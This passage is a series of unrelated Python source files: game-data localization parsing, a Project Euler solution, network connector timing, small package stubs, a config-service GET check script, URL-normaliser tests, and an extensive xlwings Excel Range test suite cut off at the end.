'T2_2H_BOW', 'unlockedtocraft': 'false', 'unlockedtoequip': 'false', 'weight': '3'} In [31]: ri.getchildren() Out[31]: [<Element 'projectile' at 0x7fd2afa6b728>, <Element 'SocketPreset' at 0x7fd2afa6b818>, <Element 'craftingrequirements' at 0x7fd2afa6b868>, <Element 'craftingspelllist' at 0x7fd2afa6b908>, <Element 'AudioInfo' at 0x7fd2afa6bb88>] In [32]: ri.get('projectile') In [33]: ri.find('projectile') Out[33]: <Element 'projectile' at 0x7fd2afa6b728> In [34]: ri.find('craftingrequirements') Out[34]: <Element 'craftingrequirements' at 0x7fd2afa6b868> In [35]: c = _ In [36]: c Out[36]: <Element 'craftingrequirements' at 0x7fd2afa6b868> In [37]: c.getchildren() Out[37]: [<Element 'craftresource' at 0x7fd2afa6b8b8>] In [38]: c.getchildren()[0] Out[38]: <Element 'craftresource' at 0x7fd2afa6b8b8> In [39]: c.getchildren()[0].attrib Out[39]: {'count': '32', 'uniquename': 'T2_PLANKS'} """ def build_localization_lookup(lang='EN-US'): """ Takes the localization XML and builds a lookup dictionary for the language given :return: dictionary of {itemID:localized name} """ loc_dict = {} loc_tree = ET.parse('libs/game_data/localization.xml') loc_root = loc_tree.getroot() # TODO: This [0] reference might cause a bug, find a cleaner way loc_items = loc_root.getchildren()[0] for item in loc_items: try: # Get the item ID string item_id = item.attrib['tuid'] # Get the target lang for localization for loc_str in item: if loc_str.attrib['{http://www.w3.org/XML/1998/namespace}lang'] == lang: localized = loc_str.find('seg').text if localized is not None: loc_dict[item_id] = localized else: loc_dict[item_id] = item_id break else: loc_dict[item_id] = item_id except: print(traceback.format_exc()) return loc_dict
python
def main(): for a in range(1,int(1000/3)+1): for b in range(a+1, int(500-a/2)+1): # b < c <=> b < 1000-(a+b) <=> b < 500 - a/2 if chkVal(a, b): print(a * b * (1000-(a+b))) def chkVal(a, b): left_term = a**2 + b**2 right_term = (1000 - (a + b))**2 return left_term == right_term if __name__=="__main__": main() # Answer: 31875000
python
import time from hyades.inventory.inventory import InventoryManager inventory = InventoryManager('inventory.yml') connectors_result = {} for device in inventory.filter(mode='sync'): connector = device.connection_manager.registry_name print(f'\nStart collecting {device.name} with {connector}') connectors_result[connector] = [] for it in range(10): start = time.time() device.connect() output = device.parse("show version") print(output) device.disconnect() end = time.time() connectors_result[connector].append(end - start) print('\n\n') for connector in connectors_result: total_time = sum(connectors_result[connector]) mean_time = total_time/len(connectors_result[connector]) min_time = min(connectors_result[connector]) max_time = max(connectors_result[connector]) print(f"Connector: {connector}:\n" f"Max time: {max_time}\n" f"Min time: {min_time}\n" f"Mean time: {mean_time}\n\n")
python
from yourproduct.config import Config CONFIG: Config = Config()
python
# -*- coding: utf-8 -*- from __future__ import print_function from ._version import get_versions __author__ = 'Juan Ortiz' __email__ = '[email protected]' __version__ = get_versions()['version'] del get_versions def hello_world(): print('Hello, world!') return True
python
#!/usr/bin/env python import json import time try: import requests except ImportError: print "Install requests python module. pip install requests" exit(1) GREEN = '\033[92m' RED = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' def check_file(value): try: f = open(value) return f.read().strip() except IOError: print "[-] The file '{}' not found in current directory.".format(value) exit(1) URL = "http://{}:{}/configs/".format(check_file("ip"), check_file("nodePort")) try: f = open("sample_data.json") except IOError: print "[-] sample_data.json file is missing" exit(0) json_data = json.load(f) print "[+] JSON Data Loaded" with open("deleted_list.txt") as f: stored_list = f.readlines() print GREEN+"[+] Trying fetch deleted items which should FAIL!"+ENDC for config in stored_list: res = requests.get(url=URL+config.strip()) print "[*] [GET] HTTP Status code for the config {0} is {1}".format(config.strip(), res.status_code) print " [-] Response Text ->", res.text time.sleep(1) with open("available_list.txt") as f: stored_list = f.readlines() print GREEN+"[+] Trying fetch available items which should SUCCESS!"+ENDC for config in stored_list: res = requests.get(url=URL+config.strip()) print "[*] [GET] HTTP Status code for the config {0} is {1}".format(config.strip(), res.status_code) print " [-] Response Text ->", res.text time.sleep(1)
python
"""Tests for provide_url_scheme function.""" from url_normalize.url_normalize import provide_url_scheme EXPECTED_DATA = { "": "", "-": "-", "/file/path": "/file/path", "//site/path": "https://site/path", "ftp://site/": "ftp://site/", "site/page": "https://site/page", } def test_provide_url_scheme_result_is_expected(): """Assert we got expected results from the provide_url_scheme function.""" for url, expected in EXPECTED_DATA.items(): result = provide_url_scheme(url) assert result == expected, url def test_provide_url_scheme_accept_default_scheme_param(): """Assert we could provide default_scheme param other than https.""" url = "//site/path" expected = "http://site/path" actual = provide_url_scheme(url, default_scheme="http") assert actual == expected
python
import sys import os from datetime import datetime import unittest import xlwings as xw from xlwings.constants import RgbColor from .common import TestBase, this_dir # Mac imports if sys.platform.startswith('darwin'): from appscript import k as kw class TestRangeInstantiation(TestBase): def test_range1(self): r = self.wb1.sheets[0].range('A1') self.assertEqual(r.address, '$A$1') def test_range2(self): r = self.wb1.sheets[0].range('A1:A1') self.assertEqual(r.address, '$A$1') def test_range3(self): r = self.wb1.sheets[0].range('B2:D5') self.assertEqual(r.address, '$B$2:$D$5') def test_range4(self): r = self.wb1.sheets[0].range((1, 1)) self.assertEqual(r.address, '$A$1') def test_range5(self): r = self.wb1.sheets[0].range((1, 1), (1, 1)) self.assertEqual(r.address, '$A$1') def test_range6(self): r = self.wb1.sheets[0].range((2, 2), (5, 4)) self.assertEqual(r.address, '$B$2:$D$5') def test_range7(self): r = self.wb1.sheets[0].range('A1', (2, 2)) self.assertEqual(r.address, '$A$1:$B$2') def test_range8(self): r = self.wb1.sheets[0].range((1, 1), 'B2') self.assertEqual(r.address, '$A$1:$B$2') def test_range9(self): r = self.wb1.sheets[0].range(self.wb1.sheets[0].range('A1'), self.wb1.sheets[0].range('B2')) self.assertEqual(r.address, '$A$1:$B$2') def test_range10(self): with self.assertRaises(ValueError): r = self.wb1.sheets[0].range(self.wb2.sheets[0].range('A1'), self.wb1.sheets[0].range('B2')) def test_range11(self): with self.assertRaises(ValueError): r = self.wb1.sheets[1].range(self.wb1.sheets[0].range('A1'), self.wb1.sheets[0].range('B2')) def test_range12(self): with self.assertRaises(ValueError): r = self.wb1.sheets[0].range(self.wb1.sheets[1].range('A1'), self.wb1.sheets[0].range('B2')) def test_range13(self): with self.assertRaises(ValueError): r = self.wb1.sheets[0].range(self.wb1.sheets[0].range('A1'), self.wb1.sheets[1].range('B2')) def test_zero_based_index1(self): with self.assertRaises(IndexError): self.wb1.sheets[0].range((0, 1)).value = 123 def test_zero_based_index2(self): with self.assertRaises(IndexError): a = self.wb1.sheets[0].range((1, 1), (1, 0)).value def test_zero_based_index3(self): with self.assertRaises(IndexError): xw.Range((1, 0)).value = 123 def test_zero_based_index4(self): with self.assertRaises(IndexError): a = xw.Range((1, 0), (1, 0)).value def test_jagged_array(self): with self.assertRaises(Exception): self.wb1.sheets[0].range('A1').value = [[1], [1, 2]] with self.assertRaises(Exception): self.wb1.sheets[0].range('A1').value = [[1, 2, 3], [4, 5], [6, 7, 8]] with self.assertRaises(Exception): self.wb1.sheets[0].range('A1').value = ((1,), (1, 2)) # the following should not raise an error self.wb1.sheets[0].range('A1').value = 1 self.wb1.sheets[0].range('A1').value = 's' self.wb1.sheets[0].range('A1').value = [[1, 2], [1, 2]] self.wb1.sheets[0].range('A1').value = [1, 2, 3] self.wb1.sheets[0].range('A1').value = [[1, 2, 3]] self.wb1.sheets[0].range('A1').value = [] class TestRangeAttributes(TestBase): def test_iterator(self): self.wb1.sheets[0].range('A20').value = [[1., 2.], [3., 4.]] r = self.wb1.sheets[0].range('A20:B21') self.assertEqual([c.value for c in r], [1., 2., 3., 4.]) # check that reiterating on same range works properly self.assertEqual([c.value for c in r], [1., 2., 3., 4.]) def test_sheet(self): self.assertEqual(self.wb1.sheets[1].range('A1').sheet.name, self.wb1.sheets[1].name) def test_len(self): self.assertEqual(len(self.wb1.sheets[0].range('A1:C4')), 12) def test_count(self): self.assertEqual(len(self.wb1.sheets[0].range('A1:C4')), self.wb1.sheets[0].range('A1:C4').count) def test_row(self): self.assertEqual(self.wb1.sheets[0].range('B3:F5').row, 3) def test_column(self): self.assertEqual(self.wb1.sheets[0].range('B3:F5').column, 2) def test_row_count(self): self.assertEqual(self.wb1.sheets[0].range('B3:F5').rows.count, 3) def test_column_count(self): self.assertEqual(self.wb1.sheets[0].range('B3:F5').columns.count, 5) def raw_value(self): pass # TODO def test_clear_content(self): self.wb1.sheets[0].range('G1').value = 22 self.wb1.sheets[0].range('G1').clear_contents() self.assertEqual(self.wb1.sheets[0].range('G1').value, None) def test_clear(self): self.wb1.sheets[0].range('G1').value = 22 self.wb1.sheets[0].range('G1').clear() self.assertEqual(self.wb1.sheets[0].range('G1').value, None) def test_end(self): self.wb1.sheets[0].range('A1:C5').value = 1. self.assertEqual(self.wb1.sheets[0].range('A1').end('d'), self.wb1.sheets[0].range('A5')) self.assertEqual(self.wb1.sheets[0].range('A1').end('down'), self.wb1.sheets[0].range('A5')) self.assertEqual(self.wb1.sheets[0].range('C5').end('u'), self.wb1.sheets[0].range('C1')) self.assertEqual(self.wb1.sheets[0].range('C5').end('up'), self.wb1.sheets[0].range('C1')) self.assertEqual(self.wb1.sheets[0].range('A1').end('right'), self.wb1.sheets[0].range('C1')) self.assertEqual(self.wb1.sheets[0].range('A1').end('r'), self.wb1.sheets[0].range('C1')) self.assertEqual(self.wb1.sheets[0].range('C5').end('left'), self.wb1.sheets[0].range('A5')) self.assertEqual(self.wb1.sheets[0].range('C5').end('l'), self.wb1.sheets[0].range('A5')) def test_formula(self): self.wb1.sheets[0].range('A1').formula = '=SUM(A2:A10)' self.assertEqual(self.wb1.sheets[0].range('A1').formula, '=SUM(A2:A10)') def test_formula2(self): self.wb1.sheets[0].range('A1').formula2 = '=UNIQUE(A2:A10)' self.assertEqual(self.wb1.sheets[0].range('A1').formula2, '=UNIQUE(A2:A10)') def test_formula_array(self): self.wb1.sheets[0].range('A1').value = [[1, 4], [2, 5], [3, 6]] self.wb1.sheets[0].range('D1').formula_array = '=SUM(A1:A3*B1:B3)' self.assertEqual(self.wb1.sheets[0].range('D1').value, 32.) def test_column_width(self): self.wb1.sheets[0].range('A1:B2').column_width = 10.0 result = self.wb1.sheets[0].range('A1').column_width self.assertEqual(10.0, result) self.wb1.sheets[0].range('A1:B2').value = 'ensure cells are used' self.wb1.sheets[0].range('B2').column_width = 20.0 result = self.wb1.sheets[0].range('A1:B2').column_width if sys.platform.startswith('win'): self.assertEqual(None, result) else: self.assertEqual(kw.missing_value, result) def test_row_height(self): self.wb1.sheets[0].range('A1:B2').row_height = 15.0 result = self.wb1.sheets[0].range('A1').row_height self.assertEqual(15.0, result) self.wb1.sheets[0].range('A1:B2').value = 'ensure cells are used' self.wb1.sheets[0].range('B2').row_height = 20.0 result = self.wb1.sheets[0].range('A1:B2').row_height if sys.platform.startswith('win'): self.assertEqual(None, result) else: self.assertEqual(kw.missing_value, result) def test_width(self): """test_width: Width depends on default style text size, so do not test absolute widths""" self.wb1.sheets[0].range('A1:D4').column_width = 10.0 result_before = self.wb1.sheets[0].range('A1').width self.wb1.sheets[0].range('A1:D4').column_width = 12.0 result_after = self.wb1.sheets[0].range('A1').width self.assertTrue(result_after > result_before) def test_height(self): self.wb1.sheets[0].range('A1:D4').row_height = 60.0 result = self.wb1.sheets[0].range('A1:D4').height self.assertEqual(240.0, result) def test_left(self): self.assertEqual(self.wb1.sheets[0].range('A1').left, 0.0) self.wb1.sheets[0].range('A1').column_width = 20.0 self.assertEqual(self.wb1.sheets[0].range('B1').left, self.wb1.sheets[0].range('A1').width) def test_top(self): self.assertEqual(self.wb1.sheets[0].range('A1').top, 0.0) self.wb1.sheets[0].range('A1').row_height = 20.0 self.assertEqual(self.wb1.sheets[0].range('A2').top, self.wb1.sheets[0].range('A1').height) def test_number_format_cell(self): format_string = "mm/dd/yy;@" self.wb1.sheets[0].range('A1').number_format = format_string result = self.wb1.sheets[0].range('A1').number_format self.assertEqual(format_string, result) def test_number_format_range(self): format_string = "mm/dd/yy;@" self.wb1.sheets[0].range('A1:D4').number_format = format_string result = self.wb1.sheets[0].range('A1:D4').number_format self.assertEqual(format_string, result) def test_get_address(self): wb1 = self.app1.books.open(os.path.join(this_dir, 'test book.xlsx')) res = wb1.sheets[0].range((1, 1), (3, 3)).get_address() self.assertEqual(res, '$A$1:$C$3') res = wb1.sheets[0].range((1, 1), (3, 3)).get_address(False) self.assertEqual(res, '$A1:$C3') res = wb1.sheets[0].range((1, 1), (3, 3)).get_address(True, False) self.assertEqual(res, 'A$1:C$3') res = wb1.sheets[0].range((1, 1), (3, 3)).get_address(False, False) self.assertEqual(res, 'A1:C3') res = wb1.sheets[0].range((1, 1), (3, 3)).get_address(include_sheetname=True) self.assertEqual(res, "'Sheet1'!$A$1:$C$3") res = wb1.sheets[1].range((1, 1), (3, 3)).get_address(include_sheetname=True) self.assertEqual(res, "'Sheet2'!$A$1:$C$3") res = wb1.sheets[0].range((1, 1), (3, 3)).get_address(external=True) self.assertEqual(res, "'[test book.xlsx]Sheet1'!$A$1:$C$3") def test_address(self): self.assertEqual(self.wb1.sheets[0].range('A1:B2').address, '$A$1:$B$2') def test_current_region(self): values = [[1., 2.], [3., 4.]] self.wb1.sheets[0].range('A20').value = values self.assertEqual(self.wb1.sheets[0].range('B21').current_region.value, values) def test_autofit_range(self): self.wb1.sheets[0].range('A1:D4').value = 'test_string' self.wb1.sheets[0].range('A1:D4').row_height = 40 self.wb1.sheets[0].range('A1:D4').column_width = 40 self.assertEqual(40, self.wb1.sheets[0].range('A1:D4').row_height) self.assertEqual(40, self.wb1.sheets[0].range('A1:D4').column_width) self.wb1.sheets[0].range('A1:D4').autofit() self.assertTrue(40 != self.wb1.sheets[0].range('A1:D4').column_width) self.assertTrue(40 != self.wb1.sheets[0].range('A1:D4').row_height) self.wb1.sheets[0].range('A1:D4').row_height = 40 self.assertEqual(40, self.wb1.sheets[0].range('A1:D4').row_height) self.wb1.sheets[0].range('A1:D4').rows.autofit() self.assertTrue(40 != self.wb1.sheets[0].range('A1:D4').row_height) self.wb1.sheets[0].range('A1:D4').column_width = 40 self.assertEqual(40, self.wb1.sheets[0].range('A1:D4').column_width) self.wb1.sheets[0].range('A1:D4').columns.autofit() self.assertTrue(40 != self.wb1.sheets[0].range('A1:D4').column_width) self.wb1.sheets[0].range('A1:D4').rows.autofit() self.wb1.sheets[0].range('A1:D4').columns.autofit() def test_autofit_col(self): self.wb1.sheets[0].range('A1:D4').value = 'test_string' self.wb1.sheets[0].range('A:D').column_width = 40 self.assertEqual(40, self.wb1.sheets[0].range('A:D').column_width) self.wb1.sheets[0].range('A:D').autofit() self.assertTrue(40 != self.wb1.sheets[0].range('A:D').column_width) # Just checking if they don't throw an error self.wb1.sheets[0].range('A:D').rows.autofit() self.wb1.sheets[0].range('A:D').columns.autofit() def test_autofit_row(self): self.wb1.sheets[0].range('A1:D4').value = 'test_string' self.wb1.sheets[0].range('1:10').row_height = 40 self.assertEqual(40, self.wb1.sheets[0].range('1:10').row_height) self.wb1.sheets[0].range('1:10').autofit() self.assertTrue(40 != self.wb1.sheets[0].range('1:10').row_height) # Just checking if they don't throw an error self.wb1.sheets[0].range('1:1000000').rows.autofit() self.wb1.sheets[0].range('1:1000000').columns.autofit() def test_color(self): rgb = (30, 100, 200) self.wb1.sheets[0].range('A1').color = rgb self.assertEqual(rgb, self.wb1.sheets[0].range('A1').color) self.wb1.sheets[0].range('A2').color = RgbColor.rgbAqua self.assertEqual((0, 255, 255), self.wb1.sheets[0].range('A2').color) self.wb1.sheets[0].range('A2').color = None self.assertEqual(self.wb1.sheets[0].range('A2').color, None) self.wb1.sheets[0].range('A1:D4').color = rgb self.assertEqual(rgb, self.wb1.sheets[0].range('A1:D4').color) def test_len_rows(self): self.assertEqual(len(self.wb1.sheets[0].range('A1:C4').rows), 4) def test_count_rows(self): self.assertEqual(len(self.wb1.sheets[0].range('A1:C4').rows), self.wb1.sheets[0].range('A1:C4').rows.count) def test_len_cols(self): self.assertEqual(len(self.wb1.sheets[0].range('A1:C4').columns), 3) def test_count_cols(self): self.assertEqual(len(self.wb1.sheets[0].range('A1:C4').columns), self.wb1.sheets[0].range('A1:C4').columns.count) def test_shape(self): self.assertEqual(self.wb1.sheets[0].range('A1:C4').shape, (4, 3)) def test_size(self): self.assertEqual(self.wb1.sheets[0].range('A1:C4').size, 12) def test_table(self): data = [[1, 2.222, 3.333], ['Test1', None, 'éöà'], [datetime(1962, 11, 3), datetime(2020, 12, 31, 12, 12, 20), 9.999]] self.wb1.sheets[0].range('A1').value = data if sys.platform.startswith('win') and self.wb1.app.version == '14.0': self.wb1.sheets[0].range('A3:B3').number_format = 'dd/mm/yyyy' # Hack for Excel 2010 bug, see GH #43 cells = self.wb1.sheets[0].range('A1').expand('table').value self.assertEqual(cells, data) def test_vertical(self): data = [[1, 2.222, 3.333], ['Test1', None, 'éöà'], [datetime(1962, 11, 3), datetime(2020, 12, 31, 12, 12, 20), 9.999]] self.wb1.sheets[0].range('A10').value = data if sys.platform.startswith('win') and self.wb1.app.version == '14.0': self.wb1.sheets[0].range('A12:B12').number_format = 'dd/mm/yyyy' # Hack for Excel 2010 bug, see GH #43 cells = self.wb1.sheets[0].range('A10').expand('vertical').value self.assertEqual(cells, [row[0] for row in data]) cells = self.wb1.sheets[0].range('A10').expand('d').value self.assertEqual(cells, [row[0] for row in data]) cells = self.wb1.sheets[0].range('A10').expand('down').value self.assertEqual(cells, [row[0] for row in data]) def test_horizontal(self): data = [[1, 2.222, 3.333], ['Test1', None, 'éöà'], [datetime(1962, 11, 3), datetime(2020, 12, 31, 12, 12, 20), 9.999]] self.wb1.sheets[0].range('A20').value = data cells = self.wb1.sheets[0].range('A20').expand('horizontal').value self.assertEqual(cells, data[0]) cells = self.wb1.sheets[0].range('A20').expand('r').value self.assertEqual(cells, data[0]) cells = self.wb1.sheets[0].range('A20').expand('right').value self.assertEqual(cells, data[0]) def test_hyperlink(self): address = 'www.xlwings.org' # Naked address self.wb1.sheets[0].range('A1').add_hyperlink(address) self.assertEqual(self.wb1.sheets[0].range('A1').value, address) hyperlink = self.wb1.sheets[0].range('A1').hyperlink if not hyperlink.endswith('/'): hyperlink += '/' self.assertEqual(hyperlink, 'http://' + address + '/') # Address + FriendlyName self.wb1.sheets[0].range('A2').add_hyperlink(address, 'test_link') self.assertEqual(self.wb1.sheets[0].range('A2').value, 'test_link') hyperlink = self.wb1.sheets[0].range('A2').hyperlink if not hyperlink.endswith('/'): hyperlink += '/' self.assertEqual(hyperlink, 'http://' + address + '/') def test_hyperlink_formula(self): self.wb1.sheets[0].range('B10').formula = '=HYPERLINK("http://xlwings.org", "xlwings")' self.assertEqual(self.wb1.sheets[0].range('B10').hyperlink, 'http://xlwings.org') def test_insert_cell(self): self.wb1.sheets[0].range('A1:C1').value = 'test' self.wb1.sheets[0].range('A1').insert() self.assertIsNone(self.wb1.sheets[0].range('A1').value) self.assertEqual(self.wb1.sheets[0].range('A2').value, 'test') def test_insert_row(self): self.wb1.sheets[0].range('A1:C1').value = 'test' self.wb1.sheets[0].range('1:1').insert() self.assertEqual(self.wb1.sheets[0].range('A1:C1').value, [None, None, None]) self.assertEqual(self.wb1.sheets[0].range('A2:C2').value, ['test', 'test', 'test']) def test_insert_column(self): self.wb1.sheets[0].range('A1:A3').value = 'test' self.wb1.sheets[0].range('A:A').insert() self.assertEqual(self.wb1.sheets[0].range('A1:A3').value, [None, None, None]) self.assertEqual(self.wb1.sheets[0].range('B1:B3').value, ['test', 'test', 'test']) def test_insert_cell_shift_down(self): self.wb1.sheets[0].range('A1:C1').value = 'test' self.wb1.sheets[0].range('A1').insert(shift='down') self.assertIsNone(self.wb1.sheets[0].range('A1').value) self.assertEqual(self.wb1.sheets[0].range('A2').value, 'test') def test_insert_cell_shift_right(self): self.wb1.sheets[0].range('A1:C1').value = 'test' self.wb1.sheets[0].range('A1').insert(shift='right') self.assertIsNone(self.wb1.sheets[0].range('A1').value) self.assertEqual(self.wb1.sheets[0].range('B1:D1').value, ['test', 'test', 'test']) def test_delete_cell(self): self.wb1.sheets[0].range('A1').value = ['one', 'two', 'three'] self.wb1.sheets[0].range('A1').delete() self.assertIsNone(self.wb1.sheets[0].range('C1').value) self.assertEqual(self.wb1.sheets[0].range('A1').value, 'two') def test_delete_row(self): self.wb1.sheets[0].range('A1:C1').value = 'one' self.wb1.sheets[0].range('A2:C2').value = 'two' self.wb1.sheets[0].range('1:1').delete() self.assertEqual(self.wb1.sheets[0].range('A1:C1').value, ['two', 'two', 'two']) self.assertEqual(self.wb1.sheets[0].range('A2:C2').value, [None, None, None]) def test_delete_column(self): self.wb1.sheets[0].range('A1:A1').value = 'one' self.wb1.sheets[0].range('B1:B2').value = 'two' self.wb1.sheets[0].range('C1:C2').value = 'two' self.wb1.sheets[0].range('A:A').delete() self.assertEqual(self.wb1.sheets[0].range('C1:C2').value, [None, None]) self.assertEqual(self.wb1.sheets[0].range('A1:A2').value, ['two', 'two']) def test_delete_cell_shift_up(self): self.wb1.sheets[0].range('A1').value = ['one', 'two', 'three'] self.wb1.sheets[0].range('A1').delete('up') self.assertIsNone(self.wb1.sheets[0].range('A1').value) self.assertEqual(self.wb1.sheets[0].range('B1:C1').value, ['two', 'three']) def test_delete_cell_shift_left(self): self.wb1.sheets[0].range('A1').value = ['one', 'two', 'three'] self.wb1.sheets[0].range('A1').delete('left') self.assertIsNone(self.wb1.sheets[0].range('C1').value) self.assertEqual(self.wb1.sheets[0].range('A1').value, 'two') def test_copy_destination(self): sheet = self.wb1.sheets[0] sheet.range('A1:B1').value = 'test' sheet.range('A1:B1').copy(destination=sheet.range('A2')) self.assertEqual(sheet.range('A1:B1').value, sheet.range('A2:B2').value) def test_copy_clipboard(self): sheet = self.wb1.sheets[0] sheet.range('A1:B1').value = 'test' sheet.range('A1:B1').copy() def test_paste(self): sheet = self.wb1.sheets[0] sheet.range('A1:B1').value = 'test' sheet.range('A1:B1').color = (34, 34, 34) sheet.range('A1:B1').copy() sheet.range('A2').paste() self.assertEqual(sheet['A1:B1'].value, sheet['A2:B2'].value) self.assertEqual(sheet['A1:B1'].color, sheet['A2:B2'].color) def test_paste_values(self): sheet = self.wb1.sheets[0] sheet.range('A1:B1').value = 'test' sheet.range('A1:B1').color = (34, 34, 34) sheet.range('A1:B1').copy() sheet.range('A2').paste(paste='values') self.assertEqual(sheet['A1:B1'].value, sheet['A2:B2'].value) self.assertNotEqual(sheet['A1:B1'].color, sheet['A2:B2'].color) def test_resize(self): r = self.wb1.sheets[0].range('A1').resize(4, 5) self.assertEqual(r.address, '$A$1:$E$4') r = self.wb1.sheets[0].range('A1').resize(row_size=4) self.assertEqual(r.address, '$A$1:$A$4') r = self.wb1.sheets[0].range('A1:B4').resize(column_size=5) self.assertEqual(r.address, '$A$1:$E$4') r = self.wb1.sheets[0].range('A1:B4').resize(row_size=5) self.assertEqual(r.address, '$A$1:$B$5') r = self.wb1.sheets[0].range('A1:B4').resize() self.assertEqual(r.address, '$A$1:$B$4') r = self.wb1.sheets[0].range('A1:C5').resize(row_size=1) self.assertEqual(r.address, '$A$1:$C$1') with self.assertRaises(AssertionError): self.wb1.sheets[0].range('A1:B4').resize(row_size=0) with self.assertRaises(AssertionError): self.wb1.sheets[0].range('A1:B4').resize(column_size=0) def test_offset(self): o = self.wb1.sheets[0].range('A1:B3').offset(3, 4) self.assertEqual(o.address, '$E$4:$F$6') o = self.wb1.sheets[0].range('A1:B3').offset(row_offset=3) self.assertEqual(o.address, '$A$4:$B$6') o = self.wb1.sheets[0].range('A1:B3').offset(column_offset=4) self.assertEqual(o.address, '$E$1:$F$3') def test_last_cell(self): self.assertEqual(self.wb1.sheets[0].range('B3:F5').last_cell.row, 5) self.assertEqual(self.wb1.sheets[0].range('B3:F5').last_cell.column, 6) def test_select(self): self.wb2.sheets[0].range('C10').select() self.assertEqual(self.app2.selection.address, self.wb2.sheets[0].range('C10').address) def test_wrap_text(self): self.assertFalse(self.wb1.sheets[0]['A1'].wrap_text) self.wb1.sheets[0]['A1'].wrap_text = True self.assertTrue(self.wb1.sheets[0]['A1'].wrap_text) class TestRangeIndexing(TestBase): # 2d Range def test_index1(self): r = self.wb1.sheets[0].range('A1:B2') self.assertEqual(r[0].address, '$A$1') self.assertEqual(r(1).address, '$A$1') self.assertEqual(r[0, 0].address, '$A$1') self.assertEqual(r(1, 1).address, '$A$1') def test_index2(self): r = self.wb1.sheets[0].range('A1:B2') self.assertEqual(r[1].address, '$B$1') self.assertEqual(r(2).address, '$B$1') self.assertEqual(r[0, 1].address, '$B$1') self.assertEqual(r(1, 2).address, '$B$1') def test_index3(self): with self.assertRaises(IndexError): r = self.wb1.sheets[0].range('A1:B2') a = r[4].address def test_index4(self): r = self.wb1.sheets[0].range('A1:B2') self.assertEqual(r(5).address, '$A$3') def test_index5(self): with self.assertRaises(IndexError): r = self.wb1.sheets[0].range('A1:B2') a = r[0, 4].address def test_index6(self): r = self.wb1.sheets[0].range('A1:B2') self.assertEqual(r(1, 5).address, '$E$1') # Row def test_index1row(self): r = self.wb1.sheets[0].range('A1:D1') self.assertEqual(r[0].address, '$A$1') self.assertEqual(r(1).address, '$A$1') self.assertEqual(r[0, 0].address, '$A$1') self.assertEqual(r(1, 1).address, '$A$1') def test_index2row(self): r = self.wb1.sheets[0].range('A1:D1') self.assertEqual(r[1].address, '$B$1') self.assertEqual(r(2).address, '$B$1') self.assertEqual(r[0, 1].address, '$B$1') self.assertEqual(r(1, 2).address, '$B$1') def test_index3row(self): with self.assertRaises(IndexError): r = self.wb1.sheets[0].range('A1:D1') a = r[4].address def test_index4row(self): r = self.wb1.sheets[0].range('A1:D1') self.assertEqual(r(5).address, '$A$2') def test_index5row(self): with self.assertRaises(IndexError): r = self.wb1.sheets[0].range('A1:D1') a = r[0, 4].address def test_index6row(self): r = self.wb1.sheets[0].range('A1:D1') self.assertEqual(r(1, 5).address, '$E$1') # Column def test_index1col(self): r = self.wb1.sheets[0].range('A1:A4') self.assertEqual(r[0].address, '$A$1') self.assertEqual(r(1).address, '$A$1') self.assertEqual(r[0, 0].address, '$A$1') self.assertEqual(r(1, 1).address, '$A$1') def test_index2col(self): r = self.wb1.sheets[0].range('A1:A4') self.assertEqual(r[1].address, '$A$2') self.assertEqual(r(2).address, '$A$2') self.assertEqual(r[1, 0].address, '$A$2') self.assertEqual(r(2, 1).address, '$A$2') def test_index3col(self): with self.assertRaises(IndexError): r = self.wb1.sheets[0].range('A1:A4') a = r[4].address def test_index4col(self): r = self.wb1.sheets[0].range('A1:A4') self.assertEqual(r(5).address, '$A$5') def test_index5col(self): with self.assertRaises(IndexError): r = self.wb1.sheets[0].range('A1:A4') a = r[4, 0].address def test_index6col(self): r = self.wb1.sheets[0].range('A1:A4') self.assertEqual(r(5, 1).address, '$A$5') class TestRangeSlicing(TestBase): # 2d Range def test_slice1(self): r = self.wb1.sheets[0].range('B2:D4') self.assertEqual(r[0:, 1:].address, '$C$2:$D$4') def test_slice2(self): r = self.wb1.sheets[0].range('B2:D4') self.assertEqual(r[1:2, 1:2].address, '$C$3') def test_slice3(self): r = self.wb1.sheets[0].range('B2:D4') self.assertEqual(r[:1, :2].address, '$B$2:$C$2') def test_slice4(self): r = self.wb1.sheets[0].range('B2:D4') self.assertEqual(r[:, :].address, '$B$2:$D$4') # Row def test_slice1row(self): r = self.wb1.sheets[0].range('B2:D2') self.assertEqual(r[1:].address, '$C$2:$D$2') def test_slice2row(self): r = self.wb1.sheets[0].range('B2:D2') self.assertEqual(r[1:2].address, '$C$2') def test_slice3row(self): r = self.wb1.sheets[0].range('B2:D2') self.assertEqual(r[:2].address, '$B$2:$C$2') def test_slice4row(self): r = self.wb1.sheets[0].range('B2:D2') self.assertEqual(r[:].address, '$B$2:$D$2') # Column def test_slice1col(self): r = self.wb1.sheets[0].range('B2:B4') self.assertEqual(r[1:].address, '$B$3:$B$4') def test_slice2col(self): r = self.wb1.sheets[0].range('B2:B4') self.assertEqual(r[1:2].address, '$B$3') def test_slice3col(self): r = self.wb1.sheets[0].range('B2:B4') self.assertEqual(r[:2].address, '$B$2:$B$3') def test_slice4col(self): r = self.wb1.sheets[0].range('B2:B4') self.assertEqual(r[:].address, '$B$2:$B$4') class TestRangeShortcut(TestBase): def test_shortcut1(self): self.assertEqual(self.wb1.sheets[0]['A1'], self.wb1.sheets[0].range('A1')) def test_shortcut2(self): self.assertEqual(self.wb1.sheets[0]['A1:B5'], self.wb1.sheets[0].range('A1:B5')) def test_shortcut3(self): self.assertEqual(self.wb1.sheets[0][0, 1], self.wb1.sheets[0].range('B1')) def test_shortcut4(self): self.assertEqual(self.wb1.sheets[0][:5, :5], self.wb1.sheets[0].range('A1:E5')) def test_shortcut5(self): with self.assertRaises(TypeError): r = self.wb1.sheets[0]['A1', 'B5'] def test_shortcut6(self): with self.assertRaises(TypeError): r = self.wb1.sheets[0][self.wb1.sheets[0]['A1'], 'B5'] def test_shortcut7(self): with self.assertRaises(TypeError): r = self.wb1.sheets[0]['A1', self.wb1.sheets[0]['B5']] class TestRangeExpansion(TestBase): def test_table(self): sht = self.wb1.sheets[0] rng = sht[0, 0] rng.value = [['a'] * 5] * 5 self.assertEqual(rng.options(expand='table').value, [['a'] * 5] * 5) def test_vertical(self): sht = self.wb1.sheets[0] rng = sht[0, 0:3] sht[0, 0].value = [['a'] * 3] * 5 self.assertEqual(rng.options(expand='down').value, [['a'] * 3] * 5) def test_horizontal(self): sht = self.wb1.sheets[0] rng = sht[0:5, 0] sht[0, 0].value = [['a'] * 3] * 5 self.assertEqual(rng.options(expand='right').value, [['a'] * 3] * 5) class TestCellErrors(TestBase): def test_cell_erros(self): wb = 